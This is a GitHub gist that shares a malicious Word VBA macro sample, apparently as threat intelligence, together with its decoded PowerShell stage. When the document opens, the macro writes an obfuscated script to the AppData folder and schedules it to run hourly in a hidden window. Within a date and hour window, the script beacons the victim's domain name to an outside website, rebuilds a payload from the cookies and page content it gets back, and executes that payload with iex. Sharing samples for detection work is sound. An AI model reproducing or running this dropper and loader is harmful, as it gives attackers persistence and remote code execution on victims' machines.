Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c

Created October 8, 2018 16:12
Show Gist options
  • Save JohnLaTwC/115eefd96af987b36e312725e32927e4 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/115eefd96af987b36e312725e32927e4 to your computer and use it in GitHub Desktop.
Download ZIP
VBA PS1 Threat
Raw
ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c
## Uploaded by @JohnLaTwC
## Sample hash: ae986d7b6190876e4229bb1f3b8b3a99190eb89c360ce1e15efef3290afd1b7c
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = VBA.Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = VBA.Hex(nGroup)
nGroup = VBA.String(6 - Len(nGroup), "0") & nGroup
pOut = VBA.Chr(CByte("&H" & VBA.Mid(nGroup, 1, 2))) + _
VBA.Chr(CByte("&H" & VBA.Mid(nGroup, 3, 2))) + _
VBA.Chr(CByte("&H" & VBA.Mid(nGroup, 5, 2)))
sOut = sOut & VBA.Left(pOut, numDataBytes)
Next
Base64Decode = sOut
End Function
Sub UnhideText(ByVal rng As Word.Range)
rng.Font.Hidden = False
With ActiveDocument.Range
.Font.Bold = True
.Font.ColorIndex = wdBlack
.ParagraphFormat.Alignment = wdAlignParagraphJustify
.Font.Size = 14
End With
Err.Clear
On Error GoTo Label1
With Selection.Find
.Text = "spaceintended"
.Replacement.Text = " "
.Execute Replace:=wdReplaceAll, Forward:=True, _
Wrap:=wdFindContinue
End With
Exit Sub
Label1:
MyMsg = MsgBox("Save document locally first and try again!", vbInformation, "Error")
End Sub
Private Sub Document_Open()
'Dim bmRange As Range
'Set bmRange = ActiveDocument.Bookmarks("bm1").Range
'UnhideText bmRange
'ActiveDocument.Bookmarks.Add _
' Name:="bm1", _
' Range:=bmRange
Dim Code As String
Code = Code & "IC4oICRwc0hvbWVbNF0rJFBTaE9tRVszMF0rJ3gnKSggTkV3LU9iamVjdCBzWVN0ZU0uaU8uQ29tcHJFc1NJb04uREVmbEF0RVNU"
Code = Code & "UkVBbSggW1NZU1RFbS5pby5tZW1vcnlTdFJlYU1dIFtjT25WRVJ0XTo6ZnJvTWJBU0U2NFN0cmlOZygnZlZoL2I1dEtGdjIvVXI4"
Code = Code & "RFF0bEh2SW5keEVtNzNUeFZ1OWllcHFneDVJR2R2Q2lLZGpCTTRxa040OEk0cm1YeDNmZmVBV3h3VEN1NUlzRGN1ZmVjYzM4TUhw"
Code = Code & "UHRPei9oL21UT3RMYnRSMHdMemkvdUxqVzRPMTh5N2ZoeHRGNndwMk45YzU1dHpqSmRhejlyaG4xSFhHbWNHbjNIYUxVMDdVOU5T"
Code = Code & "KzgwN1ZpZmovVVQvZTQ2NUhwTE85WWU1WHBCY09WWmhvdTd1UGlyWnFRUDNnaldrbUVuY09KWDVzSzFOTUNLTXVTUmtmYTZ2ajZy"
Code = Code & "THIvSU5oOXg3ODBsR2dGVE92b1F3RG9yZm9IL0IvQkw0ZWZBYjUxS0ZuVkc1Ry9aSVhadTlVL3ZiWWpNZFVYaUI5SVM5bTFDbmtu"
Code = Code & "QzRvQnRReTVqYlQ4YkM3RHBTV0cwM3I4N1lDWTBSOHpiTHZ2dmNSV2xPbUpyc0JPSHZ0RTZOWVpnN2JTNmlWWkNoQnN5RENiMDEv"
Code = Code & "am1hRm04ZVZZTkhNQ3Jlb2lXa3pRM1BTMFhkTE9kUlI5aFVXc3FkeldEaFRGRDFFTDQzUU9OOVhYZ3RIcmlvL212Q1ljWERrTXdN"
Code = Code & "QisyQUhSeUM2VnIyN0FVQXUyQmo1Smg2Q2ZEcTJ1Z3AvMVZKSkV2dFRwWXVIRVloZ1p1eVFFZTdXZ1RVbE9TTk5QYXNaQ0JpS1hQ"
Code = Code & "NHhSdUQ2aTV6dUN0emZ0M0d2eGp2N2pVMmgvZnY4c08rdnJOR1NjMVo3ZG81UHQzU3hlTUFZSjJqVnpJTmpvc1dkVlo0eC9makFZ"
Code = Code & "NHBtTHA3bExIaXVYVDBXYnEwSEdTN1dMNVJzVXlnVkRtVXZ1c3RVV0N0K0FWRjI2OVNPMzhzN1lmMEdWVFFKRVRiemY3bzU1b3o2"
Code = Code & "WDdtQjMrdnYvREp2K0hJcTY1ZjlHRkFJYlVpU3YrUjFURXlBVFR6czlhV3MzVGl5WlB3ejJaYkQzZGdsK1NEMnR6Y1p6bUxPeTdI"
Code = Code & "amE1WHQyaVFCN2s4WkRWUlBTUTR3N2x6VWxLL2VTd2Q3VldMWlJ1WXloaTZGdDJwVmprc1VCeHVpaXgxNHdwS2x3dXJ1cTU2bmRF"
Code = Code & "OHZKQmxRS0lyNXIyQ2FaR3VQRHoyOXZLWUt3NjhPRERoOVdxS2VxdmxwdktzWHRUTDE0WFdWNHpsRE4xZk9QK0ZJV0JSY2g0TlU3"
Code = Code & "clNZcEZkY2FTcWhmcWZzclJ2NlRKQ1kvMEhUdXNlOUZWWGh5cWNacHh4MVRSNGlKTzZ3RWJjM3ppVDlBNS94WHA1L09HMml1bmxq"
Code = Code & "c1l1L1BLbGlVRnRXcGEyemlZcVozUmZIOXE3QVVwOGRraXI2VExobDJmTGR1YzF3TXRyVmVSaFBWYlV5amdnN2J1V1M4bG5tZFZV"
Code = Code & "cTVUZWxSd1YyZG5oWm5oVEg2d0FPM2FyT2ljOEJMMHgzOWxtMC9aNW5PMkF4N2crSGVPUlk0dFM3SGVzNTlGMFU4NzkyeUMzWGZK"
Code = Code & "VWxUcmtBZUpTTVV6WE42S0ZVdThLWnZQTzMyQnU2QUtvOGlQc1JzaUtTSnVrc0tLVEJMMjE1aDVzbGFaeXJZQXJ0WFVnRmpOV0R2"
Code = Code & "dlFTQklvYnI2ZnJjeVhQWVRFYzBkWlJPY090cmpoR3Y2MGZGUktDTG9CaTI0ZXVZSjVFSXliNEZaaU0yRGdNRlRTSE9GZEVwVHF5"
Code = Code & "aGtCL3p1Tzg1M1R0S3QwN2lJOWp4S3FBZEc3S3lqd3h2ME8yZWVYcTFmZVR4UWE5VTRKTkQ5R1FJRXJiWFZzZUpYTVdQSFRVNGln"
Code = Code & "czhpWVg0d3hmMzZnZ3B3SWRNNHV0eDNCSjFSaTNqWnRzVEMzUlg2UkR5YWNnaWtvd2ZVRVRPcmNHbXZnWnJoemdNb2ZRNk5mR3JG"
Code = Code & "MlNuYUZzNTNNSTFJSEM1eEt6Wkp5RitvaTkrUWFFenExY05RZTdYdnl5WnY3ZktyS1BTb05IanFLZ2xLUldLTnBoV2czY00vRlUr"
Code = Code & "SEdFNFpOUDh3Uis4d2pRSXg5Q28wcmxpUHBzeExLYWNGWmdKNUpHbkpZemxaSVlsOUpUSXNqMkxHbXhpc09yRkhJY1YxcktRUS9r"
Code = Code & "TEZwRFVLNzhra3BZd3FEcFdzcUVPZDcwQjBoVVFjdmhTSE5RcXBneDRVRElKV2Zrc2hTTjRsUDhmN0ZGNldzM1JaSmZhclRKNkNp"
Code = Code & "c2ZXZmhaQ0VpcHdVT3V1bXVQZ1ltSW9xbzNZT0ppVGNzcVRIS3U5bEtTQUErWWsvMDFLQ3N5M2FrcVNIa1VUTk0vSUFESnlSam1w"
Code = Code & "cDZSUzJqVVNLZnVLRG5VOGFPQnk1OTZiYkJTUWZpV1ZBZUE5NDNRdkc3RkNxQmpBbnppbkV0S1JGdEw2RFpVRDZneDliaXNxZzBJ"
Code = Code & "empVd09ZajhpOVg2ek93emNsMG5XTFhlN2RwM3hyU0xvMVBpT0pEa043U2VJQnJZNUpQWEJvWHVvU09OR0VYZVE2UjlvTWE5MmVh"
Code = Code & "WUgwaWdHcklLRGk5b01XdXUvUmx0MWt5aFM3VDBPRlVkNFNBTVVoZ05xVTNBSDBwNGxpVWpNUUtKUXFvUEU1WFk4bC9OMUh3NEJQ"
Code = Code & "RjR5STFlaGh3UEtQSmZoYm55R3BBR2pOQUtyWDdZT2RuZjl1bmJjdVljUUN6MWZzM3pzeCtoVXpJVWYrWUR4TWF2VzJnamxwVWFI"
Code = Code & "ZXg1ZmRQK0hEVlgxZ21paHB0ZkVnN05jcTZPSEZPWkdIdXVOTk50bWhlYWp6ZDJhdnB4bFYxZjZja1MvZmo1VXJIcktmcXFPZDdV"
Code = Code & "NmdmYXlwdk1hYkxNNzZSN0RVOHZzM1d3UC9hL216Wkk0OXMxYWE4SFdJK3IwekpSOG9wZmVpTG84ZnRIUnZ1M1RadnNqWG9saTcw"
Code = Code & "Q296aUhsbWVSYXpmWGozV0NmTm82NFk1ZnZWTHJYVEdOL2p1bjdIeDUrd1NlNG9QV0h4R3ZKNGJLaFRheElMeUUvM3pTNGo2WE91"
Code = Code & "c1VJWFF5R2RSVUxOVVMycXhPOFZwemNKOWpiV3FkRm83dFh3OHlyOGFiUFlkMWdOUFd3QStSRjgyanpQS2F1MVZRSnhadmhoRXl3"
Code = Code & "RXNKSWt6Y1JRWjBaM3cwQ3U1TXNWNTdzeW1IeldGSWdxVGNkcjBqZ0RGaHkrTHlwUGdxVlU5dVc3aDhLSjFVMzJBcGhDWXB4dFZv"
Code = Code & "bTREMXZyUWJUcUlPS1hrdjIrRlJNdG1mMW1oemczTEpycnppUDdVMUkvUGw0MTNjQkY4aitpQUVPY3o1ajlhRXozVC82eEZoQlpE"
Code = Code & "RDlKMzdxS08ycEdqS2dERUtuQkE3b0oxL2d6ckYyWnlJME53Uk0zdUFucjllWEFRZmNPcThtUUhOMXRTMWE1Y2tRZzd4VVg1SVM5"
Code = Code & "VGxGUkQxZmhmd0paOFg0cFpxKzBOUWdTQUxPMzFIelpzeFF3Y3FScktseUJJNDlJdmFvT3ZPQU9seVl3cUVWeVh6a1VXODBKRU93"
Code = Code & "VEJKaXk0WHd1TFFxWHhRUS9jZUo0dU1KL1JyZVVoZGFvTWNHZ1VOdHlhZzl3cnBhblF6TDgyWUZWeVVDSkw1K3NNMWxzU29PTWky"
Code = Code & "dHJpYVVoS29Wb0ltMUtuT2dpWlk2d2hPSUJuUUlZZDJ3bUw2TXZ1a0hnN0pxWVZSRWRFc0ZWWUhhaFk1Q1FrRXhBNUprclczYkNN"
Code = Code & "U1FMaExLUEk4TW9QZmJJMHJpVWZaNHRMR3lKd2daWDdBcDNwUjRzNytrcm90dzBJV3lqU09OZGdKdjNRcVlieVRIN3lWUHVlbEcr"
Code = Code & "RWUzVG1ySjZsa1FObEZQWUIvMWpGcENtWVVIQ3dmdHFpa0licHkzV3FYZlZuWnkwaVNUbm1tYnRyOHIvVGVlQmtKMnVkK2JzNnU3"
Code = Code & "aCtzejFPOE42bGRmMGhHMkhQMkZ5RlFtMUtMMnRhNmtHWUVFWUpZbU5LU0JFOU1SQXdrMDFBdmZkYzBIOG92MUs5OUhkYzUrNlRq"
Code = Code & "MFRIeHFtOUNuMU9JTzNQQ3BtNWgwemY0bS9leng3QW51bUs1THpUWDVCWVJuaitjQTMvOEInICksIFtJby5jb01QUkVzU0lvTi5j"
Code = Code & "b01wckVTU2lvTk1PRGVdOjpEZWNPTVBSZVNzKSB8ICV7TkV3LU9iamVjdCAgU1lzVEVNLklvLnN0ckVhbVJlQURFUiggJF8gLCBb"
Code = Code & "dGV4dC5FTmNPZGluZ106OkFTQ0lJICl9IHwlIHskXy5SRUFEdG9lbmQoKSB9KQ=="
Dim fileNo As Integer
fileNo = FreeFile
Open VBA.Environ("appdata") & "\servicemaintenance.ps1" For Output As #fileNo
Print #fileNo, Base64Decode(Code)
Close #fileNo
Dim wsh As Object
Set wsh = VBA.CreateObject("WScript.Shell")
Dim waitOnReturn As Boolean: waitOnReturn = True
Dim windowStyle As Integer: windowSyle = 1
wsh.Run "SchTasks /Create /F /SC HOURLY /MO 2 /TN ""Redzone Maintenance Service"" /TR ""Powershell -ExecutionPolicy Bypass -Noprofile -windowstyle hidden -nologo -Noninteractive -command %APPDATA%\servicemaintenance.ps1""", 0, False
End Sub
## writes servicemaintenance.ps1:
.( $psHome[4]+$PShOmE[30]+'x')( NEw-Object sYSteM.iO.ComprEsSIoN.DEflAtESTREAm( [SYSTEm.io.memoryStReaM] [cOnVERt]::froMbASE64StriNg('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' ), [Io.coMPREsSIoN.coMprESSioNMODe]::DecOMPReSs) | %{NEw-Object SYsTEM.Io.strEamReADER( $_ , [text.ENcOding]::ASCII )} |% {$_.READtoend() })
## decodes to:
.($psHome[4] + $PShOmE[30] + 'x')(NEw - Object sYSteM.iO.ComprEsSIoN.DEflAtESTREAm([SYSTEm.io.memoryStReaM][cOnVERt]::froMbASE64StriNg('Set-Variable -Name c13V4 -Value ([Type]("{1}{0}" -f '
NVERt ','
CO ')) ; sV ("lU"+"VGdi") ( [typE]("{0}{1}{2}" -F '
sYST ','
EM.cOnveR ','
t ') ) ; SET vyG0 ( [typE]("{3}{5}{0}{4}{2}{1}"-f '
c ','
Ing ','
D ','
s ','
O ','
ystem.TEXt.EN ') ) ;Set-Variable -Name eRRoractIoNPrEfErence -Value ("{1}{0}"-f'
p ','
Sto ')
Set - Variable - Name dATeS - Value(@(("{1}{0}" - f("{1}{0}" - f 'y', 'nda'), 'Mo'), ("{1}{0}" - f("{0}{1}" - f 'e', 'sday'), 'Tu'), ("{0}{2}{1}" - f 'T', ("{1}{0}" - f 'y', 'rsda'), 'hu'), ("{2}{0}{1}" - f 'a', 'y', ("{2}{0}{1}" - f 'ednes', 'd', 'W')), ("{2}{0}{1}" - f 'd', 'ay', 'Fri'))) Set - Variable - Name DAY - Value(.("{2}{1}{0}" - f("{0}{1}" - f '-Dat', 'e'), 'et', 'G') - Format("{1}{0}" - f 'd', 'ddd')) if ($ {
d `AtEs} -notcontains ${D`Ay})
{
exit -5
}
Set-Variable -Name HOUr -Value (.("{0}{1}"-f ("{1}{2}{0}" -f'Da','Ge','t-'),'te') -Format ('%H'))
Set-Variable -Name houR -Value ([Int]${hO`Ur})
if ( ${H`our} -lt 8 -or ${HO`UR} -gt 18 )
{
exit -4
}
Set-Variable -Name mOn -Value (&("{0}{1}{2}" -f'Ge','t-D','ate') -Format ('%M'))
Set-Variable -Name Mon -Value ([Int32]${M`On})
if ( ${m`on} -ne 10) {
exit -3
}
Set-Variable -Name dAY -Value (.("{0}{1}{2}"-f ("{1}{0}" -f 'et-','G'),'Da','te') -Format ('%d'))
Set-Variable -Name dAY -Value ([Int]${D`AY})
if ( ${d`AY} -lt 4 -Or ${D`Ay} -gt 12 ){
exit -2
}
Set-Variable -Name doMaIN -Value ("{0}{1}{4}{3}{2}" -f 'ht','tp:',("{1}{0}"-f'a.org/','nd'),("{0}{1}"-f'r','edpa'),("{1}{0}"-f 'w.','//ww'))
Set-Variable -Name FIRstURL -Value ("{1}{3}{0}{2}" -f ("{1}{0}" -f 'nChe','o'),'v',("{0}{1}" -f 'c','ker'),("{1}{0}" -f 'si','er'))
Set-Variable -Name SECONdURL -Value ("{2}{3}{1}{0}"-f ("{0}{1}"-f 'Ve','rsions'),("{1}{0}"-f'le','ab'),'ava','il')
Set-Variable -Name thIRDURl -Value ("{4}{3}{2}{0}{1}"-f'e',("{0}{1}"-f 'cke','r'),'Ch',("{1}{0}" -f 'te','pda'),'u')
Set-Variable -Name fINAlURL -Value ("{0}{1}"-f("{0}{1}" -f'u','pda'),'te')
Set-Variable -Name WeBsESSIon -Value (.("{1}{0}{2}" -f("{0}{1}" -f 'w-','Objec'),'Ne','t') ("{5}{7}{6}{8}{2}{3}{1}{4}{9}{0}{10}"-f'ess','eq','d','s.WebR','uest','Microsof','PowerShell.Co','t.','mman','S','ion'))
Set-Variable -Name wEbreQUeSt -Value (&("{2}{1}{0}{3}"-f ("{0}{1}" -f'ke-','W'),'vo','In',("{2}{0}{1}"-f'Requ','est','eb')) -Uri "$($domain)$($firstUrl)" -WebSession ${WeBsEs`sI`On})
Set-Variable -Name COOKiEs -Value (${We`BS`E`SsioN}."COO`KieS".("{0}{1}{2}{3}"-f'Get','Coo','k','ies').Invoke("$($domain)$($firstUrl)"))
foreach (${Co`oKiE} in ${COo`k`IES}) {
${we`BSES`siOn}."c`OokIeS".("{1}{0}" -f 'd','Ad').Invoke(${dO`ma`In}, ${CoOK`IE})
}
Set-Variable -Name webrEQuest -Value (&("{2}{1}{0}{3}"-f'b',("{0}{1}" -f'nvoke-W','e'),'I',("{1}{0}{2}"-f 'ues','Req','t')) -WebSession ${w`E`BSessI`On} -Uri "$($domain)$($secondUrl)")
Set-Variable -Name CooKiES -Value (${weB`seSs`i`On}."c`oO`KiEs".("{0}{2}{1}"-f'GetC','es','ooki').Invoke("$($domain)$($secondUrl)"))
foreach (${C`ookie} in ${C`oo`Kies}) {
${WEbs`e`S`siON}."C`O`OKIES".("{1}{0}"-f'dd','A').Invoke(${d`Omain}, ${Co`oK`IE})
}
Set-Variable -Name WeBREqUest -Value (&("{4}{5}{0}{2}{3}{1}" -f("{0}{1}" -f'vo','ke-W'),("{2}{0}{1}"-f'eques','t','R'),'e','b','I','n') -Uri "$($domain)$($thirdUrl)"-WebSession ${W`EbsEs`siOn})
Set-Variable -Name COoKieS -Value (${WEB`Sess`ioN}."cOO`k`iES".("{0}{1}{2}"-f 'G','etCookie','s').Invoke("$($domain)$($thirdUrl)"))
foreach (${Cook`Ie} in ${co`oki`ES}) {
${We`BsEs`s`ion}."C`OokI`Es".("{1}{0}"-f'dd','A').Invoke(${D`OMaiN}, ${c`ookie})
}
Set-Variable -Name DnamE -Value ("{0}{2}{1}"-f 'W',("{1}{2}{0}"-f'GROUP','R','K'),'O')
Set-Variable -Name cmDNAME -Value ("{1}{2}{0}{3}"-f ("{0}{1}"-f 'miOb','j'),'Get','-W','ect')
if (.("{0}{3}{1}{2}" -f'G',("{0}{1}"-f'-Co','mm'),'and','et') ${cMD`N`AME} -errorAction ("{2}{3}{1}{4}{0}" -f'tlyContinue','e','Si','l','n'))
{
${dN`A`mE} = (.("{0}{2}{1}"-f("{2}{0}{1}" -f'WmiO','b','Get-'),'ect','j') ("{2}{4}{3}{5}{1}{0}" -f 'm','ste','Win32_','u','Comp','terSy'))."d`oMain"
}
Set-Variable -Name DNAmE -Value (${Vy`g0}::"uT`F8".("{0}{2}{1}"-f'GetB','tes','y').Invoke(${d`Name}))
Set-Variable -Name DNAme -Value ((VarIABLe c13V4 -vALuEONLy )::"T`OBAsE6`4ST`Ring"(${dNa`me}))
Set-Variable -Name TimE -Value (.("{2}{1}{0}"-f'ate','t-D','Ge') -UFormat ('%s'))
Set-Variable -Name FURi -Value ("$($domain)$($finalUrl)?id=$($dName)&t=$($time)")
Set-Variable -Name wEBrEquest -Value (&("{5}{1}{4}{2}{3}{0}" -f 't',("{0}{1}"-f'oke','-'),("{0}{1}" -f'e','bReq'),'ues','W','Inv') -WebSession ${we`Bse`sSiON} -Uri ${fU`RI})
Set-Variable -Name CoOKiEs -Value (${WEb`Ses`sION}."Co`OkieS".("{1}{2}{0}" -f'ies','G','etCook').Invoke("$($domain)$($finalUrl)"))
Set-Variable -Name dEcODer -Value (&("{0}{1}{2}"-f 'N',("{2}{1}{0}"-f'je','-Ob','ew'),'ct') ("{0}{3}{1}{2}"-f'Sys','em.B','yte[]','t') 0)
foreach (${coOK`ie} in ${COO`K`IES}) {
if(${C`oo`Kie}."N`Ame" -like ("{0}{1}" -f's',("{0}{1}" -f 'ni','tch*'))){
${D`ecOD`ER} += ( VAriabLE ("LU"+"vgDi")).vAlue::("{2}{3}{0}{1}{4}"-f'4','Str','FromBas','e6','ing').Invoke(${cOOK`iE}."V`ALUe")
}
}
Set-Variable -Name cONTENT -Value (${wEb`ReQU`Est}."c`oNTENT")
Set-Variable -Name currENtpoSitIOn -Value (0)
[byte[]]${cOMP`R`ESSeDcO`Nte`NT} = &("{2}{1}{0}" -f ("{0}{1}" -f 'je','ct'),("{1}{0}"-f '-Ob','w'),'Ne') ("{0}{1}{2}"-f'Syste','m.By','te[]') ${d`Ec`oDer}."Len`gTH"
Set-Variable -Name I -Value (0)
foreach (${P`o`SitION} in ${dE`C`oDEr}){
${coM`pr`eSSEDco`NT`EnT}[${I}] = ${coN`T`Ent}[${Cu`RRe`NT`po`SitiOn} + ${Po`siti`on}]
Set-Variable -Name currENTPOsItIon -Value (${currEN`T`POsIt`Ion} + (${pO`sit`ioN} + 1))
${I}++
}
Set-Variable -Name BANANa -Value ((LS VARiaBle:VYG0).vALue::"u`TF8"."gEtstr`I`NG"(${cOmP`ReSsE`d`cOn`TeNT}))
Set-Variable -Name aRRAYExeC -Value (@("iex", ${ba`NA`Na}))
. ${a`RrA`yeXEC}[0] ${ARR`AyEx`Ec}[1]
' ), [Io.coMPREsSIoN.coMprESSioNMODe]::DecOMPReSs) | %{NEw-Object SYsTEM.Io.strEamReADER( $_ , [text.ENcOding]::ASCII )} |% {$_.READtoend() })
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment